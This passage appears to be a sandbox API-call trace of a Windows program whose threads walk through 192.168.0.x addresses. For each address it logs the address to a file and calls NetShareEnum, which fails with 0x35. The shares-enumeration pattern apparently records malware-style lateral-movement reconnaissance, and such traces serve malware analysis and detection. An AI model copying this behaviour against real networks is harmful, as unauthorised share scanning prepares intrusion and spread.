lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x401ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.433] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.433] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.433] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x401ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.433] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.433] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.433] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x401fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x401fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.434] NetShareEnum (in: servername="\\\\192.168.0.23", level=0x1, bufptr=0x401fedc, prefmaxlen=0xffffffff, entriesread=0x401fed4, totalentries=0x401fed0, resume_handle=0x401fecc | out: bufptr=0x401fedc, entriesread=0x401fed4, totalentries=0x401fed0, resume_handle=0x401fecc) returned 0x35 [0144.054] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.77", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.054] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.77", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.77", lpUsedDefaultChar=0x0) returned 14 [0144.054] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x401ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.054] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.054] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.054] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x401ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.054] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.054] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.054] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x401fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x401fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.061] NetShareEnum (in: servername="\\\\192.168.0.77", level=0x1, bufptr=0x401fedc, prefmaxlen=0xffffffff, entriesread=0x401fed4, totalentries=0x401fed0, resume_handle=0x401fecc | out: bufptr=0x401fedc, entriesread=0x401fed4, totalentries=0x401fed0, resume_handle=0x401fecc) returned 0x35 [0178.485] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.191", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.485] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.191", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.191", lpUsedDefaultChar=0x0) returned 15 [0178.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x401ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.485] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.485] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x401ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.485] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.485] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.485] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x401fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x401fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.489] NetShareEnum (in: servername="\\\\192.168.0.191", level=0x1, bufptr=0x401fedc, prefmaxlen=0xffffffff, entriesread=0x401fed4, totalentries=0x401fed0, resume_handle=0x401fecc | out: bufptr=0x401fedc, entriesread=0x401fed4, totalentries=0x401fed0, resume_handle=0x401fecc) returned 0x35 [0211.204] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.230", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.204] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.230", cchWideChar=15, lpMultiByteStr=0x1e8306c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.230", lpUsedDefaultChar=0x0) returned 15 [0211.204] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x401fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x401fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.454] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x401ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.454] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.454] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.454] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x401ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.454] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.454] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.454] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x401fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x401fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.456] NetShareEnum (in: servername="\\\\192.168.0.230", level=0x1, bufptr=0x401fedc, prefmaxlen=0xffffffff, entriesread=0x401fed4, totalentries=0x401fed0, resume_handle=0x401fecc | out: bufptr=0x401fedc, entriesread=0x401fed4, totalentries=0x401fed0, resume_handle=0x401fecc) returned 0x35 [0258.080] SetEvent (hEvent=0x1dc) returned 1 [0258.080] RtlExitUserThread (Status=0x0) Thread: id = 45 os_tid = 0xc44 [0088.508] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.28", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.508] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.28", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.28", lpUsedDefaultChar=0x0) returned 14 [0088.508] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x415ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.508] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.508] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.508] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x415ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.508] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.509] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.509] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x415fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x415fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.574] NetShareEnum (in: servername="\\\\192.168.0.28", level=0x1, bufptr=0x415fedc, prefmaxlen=0xffffffff, entriesread=0x415fed4, totalentries=0x415fed0, resume_handle=0x415fecc | out: bufptr=0x415fedc, entriesread=0x415fed4, totalentries=0x415fed0, resume_handle=0x415fecc) returned 0x35 [0144.195] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.87", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.195] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.87", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.87", lpUsedDefaultChar=0x0) returned 14 [0144.195] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x415ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.195] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.195] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.195] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x415ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.195] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.195] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.195] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x415fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x415fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.200] NetShareEnum (in: servername="\\\\192.168.0.87", level=0x1, bufptr=0x415fedc, prefmaxlen=0xffffffff, entriesread=0x415fed4, totalentries=0x415fed0, resume_handle=0x415fecc | out: bufptr=0x415fedc, entriesread=0x415fed4, totalentries=0x415fed0, resume_handle=0x415fecc) returned 0x35 [0178.320] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.167", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.320] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.167", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.167", lpUsedDefaultChar=0x0) returned 15 [0178.320] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x415ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.320] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.320] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.320] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x415ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.320] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.320] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.320] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x415fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x415fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.328] NetShareEnum (in: servername="\\\\192.168.0.167", level=0x1, bufptr=0x415fedc, prefmaxlen=0xffffffff, entriesread=0x415fed4, totalentries=0x415fed0, resume_handle=0x415fecc | out: bufptr=0x415fedc, entriesread=0x415fed4, totalentries=0x415fed0, resume_handle=0x415fecc) returned 0x35 [0211.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.236", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.236", cchWideChar=15, lpMultiByteStr=0x1e8312c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.236", lpUsedDefaultChar=0x0) returned 15 [0211.206] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x415fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x415fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.463] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x415ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.463] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.463] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.463] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x415ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.463] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.463] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.463] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x415fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x415fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.463] NetShareEnum (in: servername="\\\\192.168.0.236", level=0x1, bufptr=0x415fedc, prefmaxlen=0xffffffff, entriesread=0x415fed4, totalentries=0x415fed0, resume_handle=0x415fecc | out: bufptr=0x415fedc, entriesread=0x415fed4, totalentries=0x415fed0, resume_handle=0x415fecc) returned 0x35 [0258.077] SetEvent (hEvent=0x1dc) returned 1 [0258.077] RtlExitUserThread (Status=0x0) Thread: id = 46 os_tid = 0xc48 [0088.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.25", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.25", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.25", lpUsedDefaultChar=0x0) returned 14 [0088.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x429ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x429ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.499] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.499] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x429fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x429fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.500] NetShareEnum (in: servername="\\\\192.168.0.25", level=0x1, bufptr=0x429fedc, prefmaxlen=0xffffffff, entriesread=0x429fed4, totalentries=0x429fed0, resume_handle=0x429fecc | out: bufptr=0x429fedc, entriesread=0x429fed4, totalentries=0x429fed0, resume_handle=0x429fecc) returned 0x35 [0144.251] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.92", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.251] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.92", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.92", lpUsedDefaultChar=0x0) returned 14 [0144.251] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x429ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.252] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.252] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.252] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x429ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.252] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.252] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.252] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x429fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x429fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.256] NetShareEnum (in: servername="\\\\192.168.0.92", level=0x1, bufptr=0x429fedc, prefmaxlen=0xffffffff, entriesread=0x429fed4, totalentries=0x429fed0, resume_handle=0x429fecc | out: bufptr=0x429fedc, entriesread=0x429fed4, totalentries=0x429fed0, resume_handle=0x429fecc) returned 0x35 [0178.363] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.173", cchWideChar=15, lpMultiByteStr=0x0, 